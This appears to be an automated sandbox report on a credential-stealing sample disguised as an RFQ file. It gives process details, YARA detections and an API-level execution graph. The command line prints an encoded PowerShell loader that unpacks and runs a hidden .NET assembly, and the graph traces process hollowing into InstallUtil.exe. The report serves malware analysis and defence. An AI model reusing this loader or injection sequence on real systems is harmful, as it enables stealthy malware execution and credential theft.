                                                                                                                        Commandline:"C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
                                                                                                                        Imagebase:0x10000
                                                                                                                        File size:433'152 bytes
                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2045997781.0000000009B70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2024331201.00000000067F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:4
                                                                                                                        Start time:05:38:06
                                                                                                                        Start date:15/01/2025
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:8
                                                                                                                        Start time:05:38:32
                                                                                                                        Start date:15/01/2025
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                        Imagebase:0x220000
                                                                                                                        File size:42'064 bytes
                                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2076310345.0000000004CB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:8.5%
                                                                                                                          Dynamic/Decrypted Code Coverage:99.5%
                                                                                                                          Signature Coverage:2.5%
                                                                                                                          Total number of Nodes:564
                                                                                                                          Total number of Limit Nodes:53
                                                                                                                          execution_graph 68540 9b6aa87 68542 9b6e358 VirtualProtect 68540->68542 68541 9b601ce 68542->68541 68543 9b6f970 68544 9b6f9b4 VirtualAlloc 68543->68544 68546 9b6fa21 68544->68546 68547 4cad01c 68548 4cad034 68547->68548 68549 4cad08f 68548->68549 68551 9b6eec0 68548->68551 68552 9b6ef19 68551->68552 68555 9b6f420 68552->68555 68553 9b6ef4e 68556 9b6f44d 68555->68556 68557 9b6e358 VirtualProtect 68556->68557 68559 9b6f5e3 68556->68559 68558 9b6f5d4 68557->68558 68558->68553 68559->68553 67878 9b664ae 67881 9b6e358 67878->67881 67883 9b6e37f 67881->67883 67885 9b6e838 67883->67885 67886 9b6e881 VirtualProtect 67885->67886 67888 9b601ce 67886->67888 67889 987c698 67890 987c6a1 67889->67890 67892 987c6c3 67890->67892 67898 987ca57 67890->67898 67902 987c6c8 67890->67902 67906 987c6d8 67890->67906 67910 987c7b8 67890->67910 67914 987c748 67890->67914 67918 987c76a 67890->67918 67900 987c72f 67898->67900 67899 987c791 67899->67892 67900->67899 67922 987e0b8 67900->67922 67904 987c6d8 67902->67904 67903 987c791 67903->67892 67904->67903 67905 987e0b8 11 API calls 67904->67905 67905->67904 67908 987c702 67906->67908 67907 987c791 67907->67892 67908->67907 67909 987e0b8 11 API calls 67908->67909 67909->67908 67912 987c72f 67910->67912 67911 987c791 67911->67892 67912->67911 67913 987e0b8 11 API calls 67912->67913 67913->67912 67916 987c72f 67914->67916 67915 987c791 67915->67892 67916->67915 67917 987e0b8 11 API calls 67916->67917 67917->67916 67920 987c72f 67918->67920 67919 987c791 67919->67892 67920->67919 67921 987e0b8 11 API calls 67920->67921 67921->67920 67923 987e0c8 67922->67923 67926 987e459 67923->67926 67927 987e4e5 67926->67927 67928 987e0ff 67926->67928 67931 987ead0 67927->67931 67961 987eae0 67927->67961 67928->67900 67932 987eae0 67931->67932 67933 987eb17 67932->67933 67991 74a05c9 67932->67991 67996 74a0334 67932->67996 68001 74a0f71 67932->68001 68006 74a0d36 67932->68006 68011 74a0a33 67932->68011 68016 74a0af0 67932->68016 68021 74a07fc 67932->68021 68026 74a087d 67932->68026 68034 74a0da6 67932->68034 68042 74a013b 67932->68042 68047 74a09d4 67932->68047 68052 74a0cac 67932->68052 68060 74a0557 67932->68060 68065 74a0397 67932->68065 68073 74a1096 67932->68073 68084 74a0516 67932->68084 68089 74a0490 67932->68089 68097 74a0691 67932->68097 68105 74a0c5f 67932->68105 68110 74a04d2 67932->68110 68115 74a0d19 67932->68115 68120 74a139e 67932->68120 68125 74a041b 67932->68125 68130 74a03d9 67932->68130 68140 74a060e 67932->68140 68145 74a1203 67932->68145 68156 74a11c9 67932->68156 67933->67928 67962 987eae9 67961->67962 67963 987eb17 67962->67963 67964 74a11c9 5 API calls 67962->67964 67965 74a05c9 3 API calls 67962->67965 67966 74a060e 3 API calls 67962->67966 67967 74a1203 5 API calls 67962->67967 67968 74a041b 3 API calls 67962->67968 67969 74a03d9 5 API calls 67962->67969 67970 74a0d19 3 API calls 67962->67970 67971 74a139e 3 API calls 67962->67971 67972 74a0c5f 3 API calls 67962->67972 67973 74a04d2 2 API calls 67962->67973 67974 74a0490 5 API calls 67962->67974 67975 74a0691 5 API calls 67962->67975 67976 74a1096 5 API calls 67962->67976 67977 74a0516 3 API calls 67962->67977 67978 74a0557 3 API calls 67962->67978 67979 74a0397 3 API calls 67962->67979 67980 74a09d4 3 API calls 67962->67980 67981 74a0cac 5 API calls 67962->67981 67982 74a0da6 5 API calls 67962->67982 67983 74a013b 3 API calls 67962->67983 67984 74a07fc 2 API calls 67962->67984 67985 74a087d 3 API calls 67962->67985 67986 74a0a33 2 API calls 67962->67986 67987 74a0af0 3 API calls 67962->67987 67988 74a0f71 3 API calls 67962->67988 67989 74a0d36 3 API calls 67962->67989 67990 74a0334 2 API calls 67962->67990 67963->67928 67964->67963 67965->67963 67966->67963 67967->67963 67968->67963 67969->67963 67970->67963 67971->67963 67972->67963 67973->67963 67974->67963 67975->67963 67976->67963 67977->67963 67978->67963 67979->67963 67980->67963 67981->67963 67982->67963 67983->67963 67984->67963 67985->67963 67986->67963 67987->67963 67988->67963 67989->67963 67990->67963 67993 74a0143 67991->67993 67992 74a0f4a 67992->67933 67993->67992 68164 74a18c1 67993->68164 68185 74a18d0 67993->68185 67997 74a033a 67996->67997 68460 74a94a0 67997->68460 68465 74a94a8 67997->68465 67998 74a0371 68003 74a0143 68001->68003 68002 74a0f4a 68002->67933 68003->68002 68004 74a18d0 3 API calls 68003->68004 68005 74a18c1 3 API calls 68003->68005 68004->68003 68005->68003 68007 74a0143 68006->68007 68008 74a0f4a 68007->68008 68009 74a18d0 3 API calls 68007->68009 68010 74a18c1 3 API calls 68007->68010 68008->67933 68009->68007 68010->68007 68012 74a0a3c 68011->68012 68469 74a9b00 68012->68469 68473 74a9af9 68012->68473 68013 74a0ab4 68017 74a0aff 68016->68017 68477 74aa1d8 68017->68477 68481 74a9dc4 68017->68481 68018 74a0b98 68018->67933 68022 74a0806 68021->68022 68490 74aa860 68022->68490 68494 74aa858 68022->68494 68023 74a085e 68023->67933 68027 74a0887 68026->68027 68498 74aa9d9 68027->68498 68503 74aa9e8 68027->68503 68028 74a0f4a 68028->67933 68029 74a0143 68029->68028 68032 74a18d0 3 API calls 68029->68032 68033 74a18c1 3 API calls 68029->68033 68032->68029 68033->68029 68035 74a0db5 68034->68035 68038 74a94a8 Wow64SetThreadContext 68035->68038 68039 74a94a0 Wow64SetThreadContext 68035->68039 68036 74a0f4a 68036->67933 68037 74a0143 68037->68036 68040 74a18d0 3 API calls 68037->68040 68041 74a18c1 3 API calls 68037->68041 68038->68037 68039->68037 68040->68037 68041->68037 68043 74a0143 68042->68043 68044 74a0f4a 68043->68044 68045 74a18d0 3 API calls 68043->68045 68046 74a18c1 3 API calls 68043->68046 68044->67933 68045->68043 68046->68043 68049 74a0143 68047->68049 68048 74a0f4a 68048->67933 68049->68048 68050 74a18d0 3 API calls 68049->68050 68051 74a18c1 3 API calls 68049->68051 68050->68049 68051->68049 68054 74a0143 68052->68054 68055 74a0691 68052->68055 68053 74a0f4a 68053->67933 68054->68053 68058 74a18d0 3 API calls 68054->68058 68059 74a18c1 3 API calls 68054->68059 68056 74a9af9 VirtualAllocEx 68055->68056 68057 74a9b00 VirtualAllocEx 68055->68057 68056->68054 68057->68054 68058->68054 68059->68054 68062 74a0143 68060->68062 68061 74a0f4a 68061->67933 68062->68061 68063 74a18d0 3 API calls 68062->68063 68064 74a18c1 3 API calls 68062->68064 68063->68062 68064->68062 68066 74a08a3 68065->68066 68068 74a0143 68065->68068 68071 74aa9e8 SleepEx 68066->68071 68072 74aa9d9 SleepEx 68066->68072 68067 74a0f4a 68067->67933 68068->68067 68069 74a18d0 3 API calls 68068->68069 68070 74a18c1 3 API calls 68068->68070 68069->68068 68070->68068 68071->68068 68072->68068 68074 74a109c 68073->68074 68518 74a9c99 68074->68518 68524 74a9ca8 68074->68524 68075 74a10b3 68082 74aa1d8 WriteProcessMemory 68075->68082 68083 74a9dc4 2 API calls 68075->68083 68076 74a0f4a 68076->67933 68077 74a0143 68077->68076 68080 74a18d0 3 API calls 68077->68080 68081 74a18c1 3 API calls 68077->68081 68080->68077 68081->68077 68082->68077 68083->68077 68086 74a0143 68084->68086 68085 74a0f4a 68085->67933 68086->68085 68087 74a18d0 3 API calls 68086->68087 68088 74a18c1 3 API calls 68086->68088 68087->68086 68088->68086 68092 74a049a 68089->68092 68090 74a0f4a 68090->67933 68091 74a0143 68091->68090 68095 74a18d0 3 API calls 68091->68095 68096 74a18c1 3 API calls 68091->68096 68092->68091 68093 74a9af9 VirtualAllocEx 68092->68093 68094 74a9b00 VirtualAllocEx 68092->68094 68093->68091 68094->68091 68095->68091 68096->68091 68098 74a069b 68097->68098 68101 74a9af9 VirtualAllocEx 68098->68101 68102 74a9b00 VirtualAllocEx 68098->68102 68099 74a0f4a 68099->67933 68100 74a0143 68100->68099 68103 74a18d0 3 API calls 68100->68103 68104 74a18c1 3 API calls 68100->68104 68101->68100 68102->68100 68103->68100 68104->68100 68107 74a0143 68105->68107 68106 74a0f4a 68106->67933 68107->68106 68108 74a18d0 3 API calls 68107->68108 68109 74a18c1 3 API calls 68107->68109 68108->68107 68109->68107 68111 74a04df 68110->68111 68113 74a9af9 VirtualAllocEx 68111->68113 68114 74a9b00 VirtualAllocEx 68111->68114 68112 74a0ab4 68113->68112 68114->68112 68116 74a0143 68115->68116 68117 74a0f4a 68116->68117 68118 74a18d0 3 API calls 68116->68118 68119 74a18c1 3 API calls 68116->68119 68117->67933 68118->68116 68119->68116 68122 74a0143 68120->68122 68121 74a0f4a 68121->67933 68122->68121 68123 74a18d0 3 API calls 68122->68123 68124 74a18c1 3 API calls 68122->68124 68123->68122 68124->68122 68127 74a0143 68125->68127 68126 74a0f4a 68126->67933 68127->68126 68128 74a18d0 3 API calls 68127->68128 68129 74a18c1 3 API calls 68127->68129 68128->68127 68129->68127 68131 74a0822 68130->68131 68132 74a03e6 68130->68132 68136 74aa858 NtResumeThread 68131->68136 68137 74aa860 NtResumeThread 68131->68137 68132->68131 68135 74a0143 68132->68135 68133 74a0f4a 68133->67933 68134 74a085e 68134->67933 68135->68133 68138 74a18d0 3 API calls 68135->68138 68139 74a18c1 3 API calls 68135->68139 68136->68134 68137->68134 68138->68135 68139->68135 68141 74a0143 68140->68141 68141->68140 68142 74a0f4a 68141->68142 68143 74a18d0 3 API calls 68141->68143 68144 74a18c1 3 API calls 68141->68144 68142->67933 68143->68141 68144->68141 68146 74a1212 68145->68146 68154 74a9ca8 2 API calls 68146->68154 68155 74a9c99 2 API calls 68146->68155 68147 74a121e 68150 74aa1d8 WriteProcessMemory 68147->68150 68151 74a9dc4 2 API calls 68147->68151 68148 74a0143 68149 74a0f4a 68148->68149 68152 74a18d0 3 API calls 68148->68152 68153 74a18c1 3 API calls 68148->68153 68149->67933 68150->68148 68151->68148 68152->68148 68153->68148 68154->68147 68155->68147 68157 74a0143 68156->68157 68158 74a1238 68156->68158 68159 74a0f4a 68157->68159 68160 74a18d0 3 API calls 68157->68160 68161 74a18c1 3 API calls 68157->68161 68162 74aa1d8 WriteProcessMemory 68158->68162 68163 74a9dc4 2 API calls 68158->68163 68159->67933 68160->68157 68161->68157 68162->68157 68163->68157 68165 74a1862 68164->68165 68165->68164 68177 74a1909 68165->68177 68206 74a1a8a 68165->68206 68212 74a1a34 68165->68212 68218 74a1d77 68165->68218 68224 74a1a17 68165->68224 68230 74a1930 68165->68230 68236 74a19b6 68165->68236 68245 74a1b5e 68165->68245 68251 74a1b1f 68165->68251 68258 74a1f1b 68165->68258 68264 74a2286 68165->68264 68270 74a1c64 68165->68270 68276 74a1940 68165->68276 68282 74a21c1 68165->68282 68288 74a1a02 68165->68288 68294 74a1fc3 68165->68294 68303 74a210a 68165->68303 68309 74a1d0d 68165->68309 68315 74a1e6a 68165->68315 68177->67993 68187 74a1862 68185->68187 68186 74a1909 68186->67993 68187->68185 68187->68186 68188 74a1e6a 3 API calls 68187->68188 68189 74a1a8a 3 API calls 68187->68189 68190 74a210a 3 API calls 68187->68190 68191 74a1d0d 3 API calls 68187->68191 68192 74a1a02 3 API calls 68187->68192 68193 74a1fc3 3 API calls 68187->68193 68194 74a1940 3 API calls 68187->68194 68195 74a21c1 3 API calls 68187->68195 68196 74a2286 3 API calls 68187->68196 68197 74a1c64 3 API calls 68187->68197 68198 74a1f1b 3 API calls 68187->68198 68199 74a1b5e 3 API calls 68187->68199 68200 74a1b1f 3 API calls 68187->68200 68201 74a1930 3 API calls 68187->68201 68202 74a19b6 3 API calls 68187->68202 68203 74a1d77 3 API calls 68187->68203 68204 74a1a17 3 API calls 68187->68204 68205 74a1a34 3 API calls 68187->68205 68188->68186 68189->68186 68190->68186 68191->68186 68192->68186 68193->68186 68194->68186 68195->68186 68196->68186 68197->68186 68198->68186 68199->68186 68200->68186 68201->68186 68202->68186 68203->68186 68204->68186 68205->68186 68207 74a199d 68206->68207 68321 74a7541 68207->68321 68326 74a7550 68207->68326 68331 74a7676 68207->68331 68335 74a7678 68207->68335 68213 74a199d 68212->68213 68214 74a7550 SleepEx 68213->68214 68215 74a7541 SleepEx 68213->68215 68216 74a7678 CreateProcessA 68213->68216 68217 74a7676 CreateProcessA 68213->68217 68214->68213 68215->68213 68216->68213 68217->68213 68219 74a199d 68218->68219 68220 74a7550 SleepEx 68219->68220 68221 74a7541 SleepEx 68219->68221 68222 74a7678 CreateProcessA 68219->68222 68223 74a7676 CreateProcessA 68219->68223 68220->68219 68221->68219 68222->68219 68223->68219 68225 74a199d 68224->68225 68226 74a7550 SleepEx 68225->68226 68227 74a7541 SleepEx 68225->68227 68228 74a7678 CreateProcessA 68225->68228 68229 74a7676 CreateProcessA 68225->68229 68226->68225 68227->68225 68228->68225 68229->68225 68231 74a1973 68230->68231 68232 74a7550 SleepEx 68231->68232 68233 74a7541 SleepEx 68231->68233 68234 74a7678 CreateProcessA 68231->68234 68235 74a7676 CreateProcessA 68231->68235 68232->68231 68233->68231 68234->68231 68235->68231 68237 74a19c5 68236->68237 68357 74a9048 68237->68357 68362 74a9039 68237->68362 68238 74a199d 68239 74a7550 SleepEx 68238->68239 68240 74a7541 SleepEx 68238->68240 68243 74a7678 CreateProcessA 68238->68243 68244 74a7676 CreateProcessA 68238->68244 68239->68238 68240->68238 68243->68238 68244->68238 68246 74a199d 68245->68246 68247 74a7550 SleepEx 68246->68247 68248 74a7541 SleepEx 68246->68248 68249 74a7678 CreateProcessA 68246->68249 68250 74a7676 CreateProcessA 68246->68250 68247->68246 68248->68246 68249->68246 68250->68246 68252 74a22c0 68251->68252 68253 74a199d 68251->68253 68252->68177 68254 74a7678 CreateProcessA 68253->68254 68255 74a7676 CreateProcessA 68253->68255 68256 74a7550 SleepEx 68253->68256 68257 74a7541 SleepEx 68253->68257 68254->68253 68255->68253 68256->68253 68257->68253 68259 74a199d 68258->68259 68259->68258 68260 74a7550 SleepEx 68259->68260 68261 74a7541 SleepEx 68259->68261 68262 74a7678 CreateProcessA 68259->68262 68263 74a7676 CreateProcessA 68259->68263 68260->68259 68261->68259 68262->68259 68263->68259 68265 74a199d 68264->68265 68266 74a7678 CreateProcessA 68265->68266 68267 74a7676 CreateProcessA 68265->68267 68268 74a7550 SleepEx 68265->68268 68269 74a7541 SleepEx 68265->68269 68266->68265 68267->68265 68268->68265 68269->68265 68271 74a199d 68270->68271 68272 74a7550 SleepEx 68271->68272 68273 74a7541 SleepEx 68271->68273 68274 74a7678 CreateProcessA 68271->68274 68275 74a7676 CreateProcessA 68271->68275 68272->68271 68273->68271 68274->68271 68275->68271 68277 74a1973 68276->68277 68278 74a7550 SleepEx 68277->68278 68279 74a7541 SleepEx 68277->68279 68280 74a7678 CreateProcessA 68277->68280 68281 74a7676 CreateProcessA 68277->68281 68278->68277 68279->68277 68280->68277 68281->68277 68283 74a199d 68282->68283 68284 74a7678 CreateProcessA 68283->68284 68285 74a7676 CreateProcessA 68283->68285 68286 74a7550 SleepEx 68283->68286 68287 74a7541 SleepEx 68283->68287 68284->68283 68285->68283 68286->68283 68287->68283 68289 74a199d 68288->68289 68290 74a7550 SleepEx 68289->68290 68291 74a7541 SleepEx 68289->68291 68292 74a7678 CreateProcessA 68289->68292 68293 74a7676 CreateProcessA 68289->68293 68290->68289 68291->68289 68292->68289 68293->68289 68295 74a1fdd 68294->68295 68377 74a2670 68295->68377 68392 74a2680 68295->68392 68296 74a199d 68297 74a7678 CreateProcessA 68296->68297 68298 74a7676 CreateProcessA 68296->68298 68299 74a7550 SleepEx 68296->68299 68300 74a7541 SleepEx 68296->68300 68297->68296 68298->68296 68299->68296 68300->68296 68304 74a199d 68303->68304 68305 74a7550 SleepEx 68304->68305 68306 74a7541 SleepEx 68304->68306 68307 74a7678 CreateProcessA 68304->68307 68308 74a7676 CreateProcessA 68304->68308 68305->68304 68306->68304 68307->68304 68308->68304 68310 74a199d 68309->68310 68311 74a7678 CreateProcessA 68310->68311 68312 74a7676 CreateProcessA 68310->68312 68313 74a7550 SleepEx 68310->68313 68314 74a7541 SleepEx 68310->68314 68311->68310 68312->68310 68313->68310 68314->68310 68316 74a199d 68315->68316 68317 74a7678 CreateProcessA 68316->68317 68318 74a7676 CreateProcessA 68316->68318 68319 74a7550 SleepEx 68316->68319 68320 74a7541 SleepEx 68316->68320 68317->68316 68318->68316 68319->68316 68320->68316 68322 74a7550 68321->68322 68339 74a7598 68322->68339 68344 74a7588 68322->68344 68323 74a757a 68323->68207 68327 74a7559 68326->68327 68329 74a7588 SleepEx 68327->68329 68330 74a7598 SleepEx 68327->68330 68328 74a757a 68328->68207 68329->68328 68330->68328 68333 74a76f8 CreateProcessA 68331->68333 68334 74a78f4 68333->68334 68337 74a76f8 CreateProcessA 68335->68337 68338 74a78f4 68337->68338 68340 74a75b4 68339->68340 68341 74a75e5 68340->68341 68349 9872078 68340->68349 68353 9872088 68340->68353 68341->68323 68346 74a7598 68344->68346 68345 74a75e5 68345->68323 68346->68345 68347 9872088 SleepEx 68346->68347 68348 9872078 SleepEx 68346->68348 68347->68346 68348->68346 68350 98720b5 68349->68350 68352 9874ca8 SleepEx 68350->68352 68351 987215c 68351->68340 68352->68351 68354 98720b5 68353->68354 68356 9874ca8 SleepEx 68354->68356 68355 987215c 68355->68340 68356->68355 68358 74a905f 68357->68358 68367 74a9090 68358->68367 68372 74a9080 68358->68372 68359 74a9072 68359->68238 68363 74a9048 68362->68363 68365 74a9080 SleepEx 68363->68365 68366 74a9090 SleepEx 68363->68366 68364 74a9072 68364->68238 68365->68364 68366->68364 68369 74a90ac 68367->68369 68368 74a90dd 68368->68359 68369->68368 68370 9872088 SleepEx 68369->68370 68371 9872078 SleepEx 68369->68371 68370->68369 68371->68369 68374 74a9090 68372->68374 68373 74a90dd 68373->68359 68374->68373 68375 9872088 SleepEx 68374->68375 68376 9872078 SleepEx 68374->68376 68375->68374 68376->68374 68378 74a2680 68377->68378 68407 74a2a6f 68378->68407 68411 74a26d8 68378->68411 68415 74a2b79 68378->68415 68419 74a28ab 68378->68419 68423 74a26c8 68378->68423 68427 74a2b05 68378->68427 68431 74a2955 68378->68431 68435 74a27f7 68378->68435 68439 74a2e95 68378->68439 68443 74a28dd 68378->68443 68447 74a2812 68378->68447 68451 74a2e7e 68378->68451 68379 74a26b4 68379->68296 68393 74a2689 68392->68393 68395 74a28ab SleepEx 68393->68395 68396 74a26c8 SleepEx 68393->68396 68397 74a26d8 SleepEx 68393->68397 68398 74a2b79 SleepEx 68393->68398 68399 74a2e7e SleepEx 68393->68399 68400 74a2a6f SleepEx 68393->68400 68401 74a28dd SleepEx 68393->68401 68402 74a2812 SleepEx 68393->68402 68403 74a27f7 SleepEx 68393->68403 68404 74a2e95 SleepEx 68393->68404 68405 74a2b05 SleepEx 68393->68405 68406 74a2955 SleepEx 68393->68406 68394 74a26b4 68394->68296 68395->68394 68396->68394 68397->68394 68398->68394 68399->68394 68400->68394 68401->68394 68402->68394 68403->68394 68404->68394 68405->68394 68406->68394 68409 74a27fd 68407->68409 68408 74a27c4 68408->68379 68409->68408 68455 74a33d0 68409->68455 68413 74a2708 68411->68413 68412 74a2777 68412->68379 68413->68412 68414 74a33d0 SleepEx 68413->68414 68414->68413 68417 74a27fd 68415->68417 68416 74a27c4 68416->68379 68417->68416 68418 74a33d0 SleepEx 68417->68418 68418->68417 68421 74a27fd 68419->68421 68420 74a27c4 68420->68379 68421->68420 68422 74a33d0 SleepEx 68421->68422 68422->68421 68425 74a2708 68423->68425 68424 74a2777 68424->68379 68425->68424 68426 74a33d0 SleepEx 68425->68426 68426->68425 68429 74a27fd 68427->68429 68428 74a27c4 68428->68379 68429->68428 68430 74a33d0 SleepEx 68429->68430 68430->68429 68433 74a27fd 68431->68433 68432 74a27c4 68432->68379 68433->68432 68434 74a33d0 SleepEx 68433->68434 68434->68433 68437 74a27fd 68435->68437 68436 74a27c4 68436->68379 68437->68436 68438 74a33d0 SleepEx 68437->68438 68438->68437 68441 74a27fd 68439->68441 68440 74a27c4 68440->68379 68441->68440 68442 74a33d0 SleepEx 68441->68442 68442->68441 68445 74a27fd 68443->68445 68444 74a27c4 68444->68379 68445->68444 68446 74a33d0 SleepEx 68445->68446 68446->68445 68449 74a27fd 68447->68449 68448 74a27c4 68448->68379 68449->68448 68450 74a33d0 SleepEx 68449->68450 68450->68449 68453 74a27fd 68451->68453 68452 74a27c4 68452->68379 68453->68452 68454 74a33d0 SleepEx 68453->68454 68454->68453 68456 74a33e0 68455->68456 68458 74a3428 SleepEx 68456->68458 68459 74a3419 SleepEx 68456->68459 68457 74a340a 68457->68409 68458->68457 68459->68457 68461 74a94a7 Wow64SetThreadContext 68460->68461 68464 74a9406 68460->68464 68463 74a9569 68461->68463 68463->67998 68464->67998 68466 74a94f1 Wow64SetThreadContext 68465->68466 68468 74a9569 68466->68468 68468->67998 68470 74a9b44 VirtualAllocEx 68469->68470 68472 74a9bbc 68470->68472 68472->68013 68474 74a9b44 VirtualAllocEx 68473->68474 68476 74a9bbc 68474->68476 68476->68013 68478 74aa224 WriteProcessMemory 68477->68478 68480 74aa2bd 68478->68480 68480->68018 68482 74a9dcd 68481->68482 68483 74a9d2e 68482->68483 68485 74a9dd3 68482->68485 68484 74a9da1 68483->68484 68488 9872088 SleepEx 68483->68488 68489 9872078 SleepEx 68483->68489 68484->68018 68485->68484 68486 74aa27e WriteProcessMemory 68485->68486 68487 74aa2bd 68486->68487 68487->68018 68488->68483 68489->68483 68491 74aa8a9 NtResumeThread 68490->68491 68493 74aa900 68491->68493 68493->68023 68495 74aa85f NtResumeThread 68494->68495 68497 74aa900 68495->68497 